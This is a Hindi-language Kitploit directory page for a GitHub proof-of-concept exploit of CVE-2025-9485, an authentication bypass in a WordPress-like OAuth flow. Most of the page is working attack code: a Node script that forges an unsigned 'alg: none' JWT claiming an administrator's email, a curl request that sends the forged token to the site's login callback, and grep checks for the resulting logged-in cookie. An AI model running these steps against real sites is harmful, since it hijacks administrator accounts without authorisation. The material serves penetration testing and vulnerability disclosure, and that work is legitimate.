Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-9485 — CVE-2025-9485 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो WordPress-जैसे OAuth प्रवाह में अहस्ताक्षरित JWT (alg: none) के माध्यम से प्रमाणीकरण बाईपास प्रदर्शित करता है। टोकन जालसाजी और कॉलबैक ट्रिगर स्क्रिप्ट शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/jfriedli/cve-2025-9485
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubjfriedli/cve-2025-9485

CVE-2025-9485

CVE-2025-9485 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो WordPress-जैसे OAuth प्रवाह में अहस्ताक्षरित JWT (alg: none) के माध्यम से प्रमाणीकरण बाईपास प्रदर्शित करता है। टोकन जालसाजी और कॉलबैक ट्रिगर स्क्रिप्ट शामिल हैं।

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण: अहस्ताक्षरित JWT के माध्यम से प्रमाणीकरण बाईपास (alg: none)

1) एक अहस्ताक्षरित JWT बनाएँ जो एडमिन ईमेल का दावा करता है

root@kitploit:~
TOKEN=$(node -e '
function b64u(s){
  return Buffer.from(s).toString("base64")
    .replace(/\+/g,"-")
    .replace(/\//g,"_")
    .replace(/=+$/,"")
}

const header = b64u(JSON.stringify({ alg: "none", typ: "JWT" }));

const now = Math.floor(Date.now()/1000);
const payload = b64u(JSON.stringify({
  iss: "https://evil.example",
  aud: "abc",
  sub: "admin-hijack",
  email: process.env.ADMIN_EMAIL,
  email_verified: "1",
  iat: now,
  exp: now + 3600
}));

console.log(header + "." + payload + ".");
')

echo "$TOKEN"

2) जाली के साथ प्रमाणीकरण कॉलबैक को ट्रिगर करें

id_token
root@kitploit:~
curl -i -A "Mozilla/5.0" \
  "$SITE/?code=DUMMY&id_token=$TOKEN&state=$STATE" \
  | tee /tmp/poc_headers.txt

3) सफल प्रमाणीकरण सत्यापित करें

root@kitploit:~
grep -i '^set-cookie: wordpress_logged_in' /tmp/poc_headers.txt
grep -i '^location:' /tmp/poc_headers.txt
टूल डाउनलोड करें